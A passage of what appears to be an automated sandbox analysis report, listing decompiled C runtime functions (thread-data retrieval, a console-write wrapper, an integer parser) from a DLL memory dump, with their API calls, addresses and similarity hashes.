0x6e1a05a7
0x6e1a05aa
0x6e1a05af
0x6e1a05af
0x6e1a05b4
0x00000000
0x6e1a05b4
0x6e1a0593
0x6e1a0593
0x6e1a0596
0x6e1a0599
0x00000000
0x6e1a0599
0x6e1a0480
0x6e1a0586
0x00000000
0x6e1a0586
0x6e1a0488
0x6e1a0574
0x6e1a0579
0x6e1a057e
0x00000000
0x6e1a057e
0x6e1a048e
0x6e1a0493
0x00000000
0x00000000
0x6e1a049c
0x00000000
0x00000000
0x6e1a04a2
0x6e1a04ab
0x6e1a04b1
0x6e1a04b6
0x6e1a04bb
0x6e1a04c2
0x6e1a04d9
0x6e1a04de
0x6e1a04e0
0x6e1a04e0
0x6e1a04e8
0x6e1a04eb
0x6e1a04ee
0x6e1a04f3
0x6e1a04f8
0x6e1a04fb
0x6e1a04fe
0x6e1a0504
0x6e1a0507
0x6e1a0511
0x6e1a0519
0x6e1a051c
0x6e1a0521
0x6e1a0524
0x6e1a0527
0x6e1a052c
0x6e1a052f
0x6e1a0509
0x6e1a0509
0x6e1a050a
0x6e1a050a
0x6e1a0535
0x6e1a0542
0x6e1a0549
0x6e1a0559
0x6e1a054b
0x6e1a0550
0x6e1a0550
0x6e1a055e
0x6e1a0561
0x6e1a0561
0x6e1a0537
0x6e1a0538
0x6e1a0538
0x6e1a0564
0x6e1a056d
0x6e1a056f
0x00000000

APIs

DName::DName.LIBVCRUNTIME ref: 6E1A04CC

Part of subcall function 6E19D5E5: __aulldvrm.LIBCMT ref: 6E19D616

DName::operator+.LIBCMT ref: 6E1A04D9
DName::operator=.LIBVCRUNTIME ref: 6E1A0559
DName::DName.LIBVCRUNTIME ref: 6E1A0579

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: NameName::$Name::operator+Name::operator=__aulldvrm
String ID:
API String ID: 2448499823-0
Opcode ID: 4daf902da2787ddb8638e8e7f488e0cd6efd8776f4b8d842b48268c5c4797959
Instruction ID: a2c47403993a51aa4d25da3c5e3d075323ceef976b53cb0e1268fd42fb76b3b9
Opcode Fuzzy Hash: 4daf902da2787ddb8638e8e7f488e0cd6efd8776f4b8d842b48268c5c4797959
Instruction Fuzzy Hash: 18518CB4900219EFCB05DF9CC894AEDBBF5BB06300F11819AD6519B250E7B4DA81EFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B416E, Relevance: 6.1, APIs: 4, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1B416E(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x6e212150; // 0x9
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6E1B1AAA(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E6E1B10AA(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E6E1B1AAA(__eflags,  *0x6e212150, _t51);
							if(__eflags != 0) {
								E6E1B3E0C(_t51, 0x6e2136fc);
								E6E1B110D(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E6E1B1AAA(__eflags,  *0x6e212150, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E6E1B1AAA(0,  *0x6e212150, 0);
							_push(0);
							L9:
							E6E1B110D();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E6E1B1A6B(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x6e212150; // 0x9
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E6E1AF464(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x6e212150; // 0x9
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E6E1B1AAA(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E6E1B10AA(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E6E1B1AAA(__eflags,  *0x6e212150, _t60);
								if(__eflags != 0) {
									E6E1B3E0C(_t60, 0x6e2136fc);
									E6E1B110D(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E6E1B1AAA(__eflags,  *0x6e212150, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E6E1B1AAA(__eflags,  *0x6e212150, _t20);
								_push(_t60);
								L25:
								E6E1B110D();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E6E1B1A6B(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x6e212150; // 0x9
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E6E1AF464(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x6e212150; // 0x9
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E6E1B1AAA(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E6E1B10AA(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E6E1B1AAA(__eflags,  *0x6e212150, _t54);
											if(__eflags != 0) {
												E6E1B3E0C(_t54, 0x6e2136fc);
												E6E1B110D(0);
												goto L45;
											} else {
												_t40 = 0;
												E6E1B1AAA(__eflags,  *0x6e212150, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E6E1B1AAA(0,  *0x6e212150, 0);
											_push(0);
											L41:
											E6E1B110D();
											goto L36;
										}
									}
								} else {
									_t54 = E6E1B1A6B(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x6e212150; // 0x9
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x6e1b416e
0x6e1b416e
0x6e1b4179
0x6e1b417b
0x6e1b4180
0x6e1b4183
0x6e1b41a1
0x6e1b41a4
0x6e1b41a9
0x6e1b41ab
0x00000000
0x6e1b41ad
0x6e1b41b9
0x6e1b41bc
0x6e1b41bd
0x6e1b41bf
0x6e1b41e4
0x6e1b41e6
0x6e1b41ff
0x6e1b4206
0x6e1b420b
0x00000000
0x6e1b41e8
0x6e1b41e8
0x6e1b41f1
0x6e1b41f6
0x00000000
0x6e1b41f6
0x6e1b41c1
0x6e1b41c1
0x6e1b41c1
0x6e1b41ca
0x6e1b41cf
0x6e1b41d0
0x6e1b41d0
0x6e1b41d5
0x00000000
0x6e1b41d5
0x6e1b41bf
0x6e1b4185
0x6e1b418b
0x6e1b418f
0x6e1b419c
0x00000000
0x6e1b4191
0x6e1b4194
0x6e1b420e
0x6e1b420e
0x6e1b4196
0x6e1b4196
0x6e1b4196
0x6e1b4198
0x6e1b4198
0x6e1b4198
0x6e1b4194
0x6e1b418f
0x6e1b4211
0x6e1b4219
0x6e1b421b
0x6e1b421d
0x6e1b4225
0x6e1b422a
0x6e1b422b
0x6e1b4230
0x6e1b4231
0x6e1b4234
0x6e1b424e
0x6e1b4251
0x6e1b4256
0x6e1b4258
0x00000000
0x6e1b425a
0x6e1b4266
0x6e1b4269
0x6e1b426a
0x6e1b426c
0x6e1b428f
0x6e1b4291
0x6e1b42a8
0x6e1b42af
0x6e1b42b4
0x00000000
0x6e1b4293
0x6e1b429a
0x6e1b429f
0x00000000
0x6e1b429f
0x6e1b426e
0x6e1b4275
0x6e1b427a
0x6e1b427b
0x6e1b427b
0x6e1b4280
0x00000000
0x6e1b4280
0x6e1b426c
0x6e1b4236
0x6e1b423c
0x6e1b423e
0x6e1b4240
0x6e1b4249
0x00000000
0x6e1b4242
0x6e1b4242
0x6e1b4245
0x6e1b42bf
0x6e1b42bf
0x6e1b42c4
0x6e1b42c7
0x6e1b42c8
0x6e1b42c9
0x6e1b42d0
0x6e1b42d2
0x6e1b42d7
0x6e1b42da
0x6e1b42f8
0x6e1b42fb
0x6e1b4300
0x6e1b4302
0x00000000
0x6e1b4304
0x6e1b4310
0x6e1b4314
0x6e1b4316
0x6e1b433b
0x6e1b433d
0x6e1b4356
0x6e1b435d
0x00000000
0x6e1b433f
0x6e1b433f
0x6e1b4348
0x6e1b434d
0x00000000
0x6e1b434d
0x6e1b4318
0x6e1b4318
0x6e1b4318
0x6e1b4321
0x6e1b4326
0x6e1b4327
0x6e1b4327
0x00000000
0x6e1b432c
0x6e1b4316
0x6e1b42dc
0x6e1b42e2
0x6e1b42e4
0x6e1b42e6
0x6e1b42f3
0x00000000
0x6e1b42e8
0x6e1b42e8
0x6e1b42eb
0x6e1b4365
0x6e1b4365
0x6e1b42ed
0x6e1b42ed
0x6e1b42ed
0x6e1b42ed
0x6e1b42ef
0x6e1b42ef
0x6e1b42ef
0x6e1b42eb
0x6e1b42e6
0x6e1b4368
0x6e1b4370
0x6e1b4372
0x6e1b4372
0x6e1b4379
0x6e1b4247
0x6e1b42b7
0x6e1b42b7
0x6e1b42b9
0x00000000
0x6e1b42bb
0x6e1b42be
0x6e1b42be
0x6e1b42b9
0x6e1b4245
0x6e1b4240
0x6e1b421f
0x6e1b4224
0x6e1b4224

APIs

GetLastError.KERNEL32(?,?,?,6E1BAE49,00000000,00000001,6E1B256F,?,6E1BB319,00000001,?,?,?,6E1B2316,?,00000000), ref: 6E1B4173
_free.LIBCMT ref: 6E1B41D0
_free.LIBCMT ref: 6E1B4206
SetLastError.KERNEL32(00000000,00000009,000000FF,?,6E1BB319,00000001,?,?,?,6E1B2316,?,00000000,00000000,6E210588,0000002C,6E1B256F), ref: 6E1B4211

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: ea7af4746c2765b06ee471ad507b9821cbbe5c96adb4fec1dd278b3da42cc88e
Instruction ID: 295ee936ca20772a256ecbf48084353c71f0c003f6f4b7bdb9791c25b708d7d6
Opcode Fuzzy Hash: ea7af4746c2765b06ee471ad507b9821cbbe5c96adb4fec1dd278b3da42cc88e
Instruction Fuzzy Hash: 6B110A73B149416E9E4095F89C8D99B269E97E7379B364524F634832C0EF319C87B120

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B42C5, Relevance: 6.1, APIs: 4, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6E1B42C5(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x6e212150; // 0x9
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6E1B1AAA(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E6E1B10AA(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E6E1B1AAA(__eflags,  *0x6e212150, _t18);
							if(__eflags != 0) {
								E6E1B3E0C(_t18, 0x6e2136fc);
								E6E1B110D(0);
								goto L13;
							} else {
								_t13 = 0;
								E6E1B1AAA(__eflags,  *0x6e212150, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E6E1B1AAA(0,  *0x6e212150, 0);
							_push(0);
							L9:
							E6E1B110D();
							goto L4;
						}
					}
				} else {
					_t18 = E6E1B1A6B(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x6e212150; // 0x9
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x6e1b42d0
0x6e1b42d2
0x6e1b42d7
0x6e1b42da
0x6e1b42f8
0x6e1b42fb
0x6e1b4300
0x6e1b4302
0x00000000
0x6e1b4304
0x6e1b4310
0x6e1b4314
0x6e1b4316
0x6e1b433b
0x6e1b433d
0x6e1b4356
0x6e1b435d
0x00000000
0x6e1b433f
0x6e1b433f
0x6e1b4348
0x6e1b434d
0x00000000
0x6e1b434d
0x6e1b4318
0x6e1b4318
0x6e1b4318
0x6e1b4321
0x6e1b4326
0x6e1b4327
0x6e1b4327
0x00000000
0x6e1b432c
0x6e1b4316
0x6e1b42dc
0x6e1b42e2
0x6e1b42e6
0x6e1b42f3
0x00000000
0x6e1b42e8
0x6e1b42eb
0x6e1b4365
0x6e1b4365
0x6e1b42ed
0x6e1b42ed
0x6e1b42ed
0x6e1b42ef
0x6e1b42ef
0x6e1b42ef
0x6e1b42eb
0x6e1b42e6
0x6e1b4368
0x6e1b4370
0x6e1b4379

APIs

GetLastError.KERNEL32(00000001,00000001,A1724430,6E1B1010,6E1B2A2C,A172442E,?,6E19B62D,A1724430,A172442E,?,?,?,6E19115E,00000001,A1724432), ref: 6E1B42CA
_free.LIBCMT ref: 6E1B4327
_free.LIBCMT ref: 6E1B435D
SetLastError.KERNEL32(00000000,00000009,000000FF,?,6E19B62D,A1724430,A172442E,?,?,?,6E19115E,00000001,A1724432), ref: 6E1B4368

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: e596cdebd537941a5e5f86c6a06e5cecdabe3bcf98e786bcaa6a6f9460edc7cd
Instruction ID: b5a1b7d4bec284d0b8e9a11de30a43166222a3bd1c3a0027586c0ac0a4f5c642
Opcode Fuzzy Hash: e596cdebd537941a5e5f86c6a06e5cecdabe3bcf98e786bcaa6a6f9460edc7cd
Instruction Fuzzy Hash: B51106737149012F8A4091F49C89D9B269EA7D767AB2A4624F224C22D4EF318C87B120

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C6473, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1C6473(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x6e2128b0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E6E1C645C();
					E6E1C641E();
					_t13 = WriteConsoleW( *0x6e2128b0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x6e1c6490
0x6e1c6494
0x6e1c64a1
0x6e1c64a6
0x6e1c64c1
0x6e1c64c1
0x6e1c64c7

APIs

WriteConsoleW.KERNEL32(?,?,6E1B256F,00000000,?,?,6E1C4201,?,00000001,?,00000001,?,6E1BADD8,00000000,00000000,00000001), ref: 6E1C648A
GetLastError.KERNEL32(?,6E1C4201,?,00000001,?,00000001,?,6E1BADD8,00000000,00000000,00000001,00000000,00000001,?,6E1BB33D,6E1B2316), ref: 6E1C6496

Part of subcall function 6E1C645C: CloseHandle.KERNEL32(FFFFFFFE,6E1C64A6,?,6E1C4201,?,00000001,?,00000001,?,6E1BADD8,00000000,00000000,00000001,00000000,00000001), ref: 6E1C646C

___initconout.LIBCMT ref: 6E1C64A6

Part of subcall function 6E1C641E: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6E1C644D,6E1C41EE,00000001,?,6E1BADD8,00000000,00000000,00000001,00000000), ref: 6E1C6431

WriteConsoleW.KERNEL32(?,?,6E1B256F,00000000,?,6E1C4201,?,00000001,?,00000001,?,6E1BADD8,00000000,00000000,00000001,00000000), ref: 6E1C64BB

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: d57907224c736debf7c06d5a98aba3f96dc8015465f8c0dafecc355f2513c2aa
Instruction ID: 2ee265158a8022126f1e7b074e87a4d77acb4f9b7dd45d172304b8ffd9ebdd89
Opcode Fuzzy Hash: d57907224c736debf7c06d5a98aba3f96dc8015465f8c0dafecc355f2513c2aa
Instruction Fuzzy Hash: 76F0123611051DBBCF122FD1CC08DDA3FA7FB2AB61B054014FB1895150C6368965EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AFE21, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 263
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E6E1AFE21(intOrPtr _a4, signed int _a8, intOrPtr* _a12, signed int _a16, signed char _a20) {
				signed char _v5;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v60;
				char _v64;
				void* __ebx;
				void* __edi;
				intOrPtr* _t82;
				signed int _t84;
				signed int _t86;
				signed int _t90;
				signed int _t91;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed char _t100;
				signed int _t102;
				signed int _t103;
				signed char _t114;
				signed int _t116;
				void* _t117;
				intOrPtr* _t119;
				signed int _t128;
				signed char _t129;
				signed char _t131;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				void* _t144;
				signed int _t146;
				intOrPtr* _t147;
				signed int _t149;
				signed int _t150;
				void* _t151;

				if(E6E1AC725( &_a8) == 0) {
					L5:
					_t128 = 0;
					_t150 = 0;
					L6:
					_t82 = _a12;
					if(_t82 != 0) {
						 *_t82 = _a8;
					}
					return _t128;
				}
				_t84 = _a16;
				if(_t84 == 0) {
					L9:
					E6E1A710E( &_v64, _t144, _a4);
					_t86 = _a8;
					_t149 = 0;
					_v20 = 0;
					_t150 = 0;
					_v48 = _t86;
					L11:
					_t129 =  *_t86;
					_a8 = _t86 + 1;
					_v16 = _t129;
					_v5 = _t129;
					_t90 = E6E1B0DD1(_t129, _t149, _t129 & 0x000000ff, 8,  &_v60);
					_t151 = _t151 + 0xc;
					__eflags = _t90;
					if(_t90 != 0) {
						_t86 = _a8;
						goto L11;
					}
					_t91 = _a20 & 0x000000ff;
					_v12 = _t91;
					__eflags = _t129 - 0x2d;
					if(_t129 != 0x2d) {
						__eflags = _t129 - 0x2b;
						if(_t129 != 0x2b) {
							_t146 = _a8;
							goto L17;
						}
						goto L15;
					} else {
						_v12 = _t91 | 0x00000002;
						L15:
						_t147 = _a8;
						_t129 =  *_t147;
						_t146 = _t147 + 1;
						_v5 = _t129;
						_v16 = _t129;
						_a8 = _t146;
						L17:
						_t135 = _a16;
						__eflags = _t135;
						if(_t135 == 0) {
							L19:
							__eflags = _t129 - 0x30 - 9;
							if(_t129 - 0x30 > 9) {
								__eflags = _t129 - 0x61 - 0x19;
								if(_t129 - 0x61 > 0x19) {
									_t97 = _t129 - 0x41;
									__eflags = _t97 - 0x19;
									if(_t97 > 0x19) {
										_t98 = _t97 | 0xffffffff;
										__eflags = _t98;
									} else {
										_t98 = _t129 + 0xffffffc9;
									}
								} else {
									_t98 = _t129 + 0xffffffa9;
								}
							} else {
								_t98 = _t129 + 0xffffffd0;
							}
							__eflags = _t98;
							if(_t98 == 0) {
								_t99 =  *_t146;
								_t146 = _t146 + 1;
								_v28 = _t99;
								_a8 = _t146;
								__eflags = _t99 - 0x78;
								if(_t99 == 0x78) {
									L35:
									__eflags = _t135;
									if(_t135 == 0) {
										_a16 = 0x10;
									}
									_t100 =  *_t146;
									_v5 = _t100;
									_v16 = _t100;
									_a8 = _t146 + 1;
									L34:
									_t102 = _a16;
									L39:
									asm("cdq");
									_push(_t129);
									_t136 = _t146;
									_v44 = _t102;
									_v40 = _t136;
									_t103 = E6E1CAE20(0xffffffff, 0xffffffff, _t102, _t136);
									_v32 = _t129;
									_t131 = _v12;
									_v36 = _t136;
									_t137 = _v5;
									_v24 = _t103;
									_v28 = _t146;
									while(1) {
										__eflags = _t137 - 0x30 - 9;
										if(_t137 - 0x30 > 9) {
											__eflags = _t137 - 0x61 - 0x19;
											if(_t137 - 0x61 > 0x19) {
												__eflags = _t137 - 0x41 - 0x19;
												if(_t137 - 0x41 > 0x19) {
													_t138 = _t137 | 0xffffffff;
													__eflags = _t138;
												} else {
													_t138 = _t137 + 0xffffffc9;
												}
											} else {
												_t138 = _t137 + 0xffffffa9;
											}
										} else {
											_t138 = _t137 + 0xffffffd0;
										}
										_v12 = _t138;
										__eflags = _t138 - 0xffffffff;
										if(_t138 == 0xffffffff) {
											break;
										}
										__eflags = _t138 - _a16;
										if(_t138 >= _a16) {
											break;
										}
										_t116 = _v20;
										_t131 = _t131 | 0x00000008;
										__eflags = _t150 - _t146;
										if(__eflags < 0) {
											L58:
											_v12 = _t138;
											L59:
											_t117 = E6E1CAEC0(_v44, _v40, _t116, _t150);
											_t150 = _t146;
											_v20 = _t117 + _v12;
											asm("adc esi, edi");
											L60:
											_t119 = _a8;
											_t146 = _v28;
											_t137 =  *_t119;
											_v16 = _t137;
											_a8 = _t119 + 1;
											continue;
										}
										_t146 = _v24;
										if(__eflags > 0) {
											L52:
											__eflags = _t116 - _t146;
											if(_t116 != _t146) {
												L57:
												_t131 = _t131 | 0x00000004;
												goto L60;
											}
											__eflags = _t150 - _v28;
											if(_t150 != _v28) {
												goto L57;
											}
											__eflags = _t149 - _v32;
											if(__eflags < 0) {
												goto L59;
											}
											if(__eflags > 0) {
												goto L57;
											}
											__eflags = _t138 - _v36;
											if(_t138 <= _v36) {
												goto L59;
											}
											goto L57;
										}
										__eflags = _t116 - _t146;
										if(_t116 < _t146) {
											goto L58;
										}
										goto L52;
									}
									_v12 = _t131;
									E6E1B0AF5( &_a8, _v16);
									__eflags = _t131 & 0x00000008;
									if((_t131 & 0x00000008) != 0) {
										_t128 = _v20;
										__eflags = E6E1AF598(_v12, _t128, _t150);
										if(__eflags == 0) {
											__eflags = _v12 & 0x00000002;
											if((_v12 & 0x00000002) != 0) {
												_t128 =  ~_t128;
												asm("adc esi, edi");
												_t150 =  ~_t150;
											}
											L72:
											__eflags = _v52;
											if(_v52 != 0) {
												 *(_v64 + 0x350) =  *(_v64 + 0x350) & 0xfffffffd;
											}
											goto L6;
										}
										 *((intOrPtr*)(E6E1B100B(__eflags))) = 0x22;
										_t114 = _v12;
										__eflags = _t114 & 0x00000001;
										if((_t114 & 0x00000001) != 0) {
											__eflags = _t114 & 0x00000002;
											if((_t114 & 0x00000002) == 0) {
												_t149 = _t149 | 0xffffffff;
												__eflags = _t149;
												_t150 = 0x7fffffff;
											} else {
												_t150 = 0x80000000;
											}
											L69:
											_t128 = _t149;
											goto L72;
										}
										_t128 = _t128 | 0xffffffff;
										_t150 = _t150 | 0xffffffff;
										goto L72;
									}
									_t150 = _t149;
									_a8 = _v48;
									goto L69;
								}
								__eflags = _t99 - 0x58;
								if(_t99 == 0x58) {
									goto L35;
								}
								__eflags = _t135;
								if(_t135 == 0) {
									_a16 = 8;
								}
								E6E1B0AF5( &_a8, _v28);
								goto L34;
							}
							__eflags = _t135;
							if(_t135 != 0) {
								L38:
								_t102 = _t135;
								goto L39;
							}
							_t102 = 0xa;
							_a16 = _t102;
							goto L39;
						}
						__eflags = _t135 - 0x10;
						if(_t135 != 0x10) {
							goto L38;
						}
						goto L19;
					}
				}
				if(_t84 < 2) {
					L4:
					 *((intOrPtr*)(E6E1B100B(_t156))) = 0x16;
					E6E1AD950();
					goto L5;
				}
				_t156 = _t84 - 0x24;
				if(_t84 <= 0x24) {
					goto L9;
				}
				goto L4;
			}

0x6e1afe36
0x6e1afe59
0x6e1afe5b
0x6e1afe5d
0x6e1afe5f
0x6e1afe5f
0x6e1afe64
0x6e1afe69
0x6e1afe69
0x6e1afe73
0x6e1afe73
0x6e1afe38
0x6e1afe3d
0x6e1afe74
0x6e1afe7a
0x6e1afe7f
0x6e1afe82
0x6e1afe84
0x6e1afe87
0x6e1afe89
0x6e1afe91
0x6e1afe91
0x6e1afe94
0x6e1afea1
0x6e1afea4
0x6e1afea7
0x6e1afeac
0x6e1afeaf
0x6e1afeb1
0x6e1afe8e
0x00000000
0x6e1afe8e
0x6e1afeb3
0x6e1afeb7
0x6e1afeba
0x6e1afebd
0x6e1afec7
0x6e1afeca
0x6e1afedd
0x00000000
0x6e1afedd
0x00000000
0x6e1afebf
0x6e1afec2
0x6e1afecc
0x6e1afecc
0x6e1afecf
0x6e1afed1
0x6e1afed2
0x6e1afed5
0x6e1afed8
0x6e1afee0
0x6e1afee0
0x6e1afee3
0x6e1afee5
0x6e1afef0
0x6e1afef4
0x6e1afef6
0x6e1aff04
0x6e1aff06
0x6e1aff12
0x6e1aff14
0x6e1aff16
0x6e1aff20
0x6e1aff20
0x6e1aff18
0x6e1aff1b
0x6e1aff1b
0x6e1aff08
0x6e1aff0b
0x6e1aff0b
0x6e1afef8
0x6e1afefb
0x6e1afefb
0x6e1aff23
0x6e1aff25
0x6e1aff33
0x6e1aff35
0x6e1aff36
0x6e1aff39
0x6e1aff3c
0x6e1aff3e
0x6e1aff5f
0x6e1aff5f
0x6e1aff61
0x6e1aff63
0x6e1aff63
0x6e1aff6a
0x6e1aff6c
0x6e1aff6f
0x6e1aff75
0x6e1aff5a
0x6e1aff5a
0x6e1aff7c
0x6e1aff7c
0x6e1aff7d
0x6e1aff7e
0x6e1aff80
0x6e1aff89
0x6e1aff8c
0x6e1aff91
0x6e1aff96
0x6e1aff99
0x6e1aff9c
0x6e1aff9f
0x6e1affa2
0x6e1affa5
0x6e1affa9
0x6e1affab
0x6e1affb9
0x6e1affbb
0x6e1affc9
0x6e1affcb
0x6e1affd5
0x6e1affd5
0x6e1affcd
0x6e1affd0
0x6e1affd0
0x6e1affbd
0x6e1affc0
0x6e1affc0
0x6e1affad
0x6e1affb0
0x6e1affb0
0x6e1affd8
0x6e1affdb
0x6e1affde
0x00000000
0x00000000
0x6e1affe0
0x6e1affe3
0x00000000
0x00000000
0x6e1affe5
0x6e1affe8
0x6e1affeb
0x6e1affed
0x6e1b0012
0x6e1b0012
0x6e1b0015
0x6e1b001d
0x6e1b0025
0x6e1b0027
0x6e1b002a
0x6e1b002c
0x6e1b002c
0x6e1b002f
0x6e1b0032
0x6e1b0035
0x6e1b0038
0x00000000
0x6e1b0038
0x6e1affef
0x6e1afff2
0x6e1afff8
0x6e1afff8
0x6e1afffa
0x6e1b000d
0x6e1b000d
0x00000000
0x6e1b000d
0x6e1afffc
0x6e1affff
0x00000000
0x00000000
0x6e1b0001
0x6e1b0004
0x00000000
0x00000000
0x6e1b0006
0x00000000
0x00000000
0x6e1b0008
0x6e1b000b
0x00000000
0x00000000
0x00000000
0x6e1b000b
0x6e1afff4
0x6e1afff6
0x00000000
0x00000000
0x00000000
0x6e1afff6
0x6e1b0046
0x6e1b0049
0x6e1b004e
0x6e1b0051
0x6e1b005d
0x6e1b006d
0x6e1b006f
0x6e1b00a2
0x6e1b00a6
0x6e1b00a8
0x6e1b00aa
0x6e1b00ac
0x6e1b00ac
0x6e1b00ae
0x6e1b00ae
0x6e1b00b2
0x6e1b00bb
0x6e1b00bb
0x00000000
0x6e1b00b2
0x6e1b0076
0x6e1b007c
0x6e1b007f
0x6e1b0081
0x6e1b008b
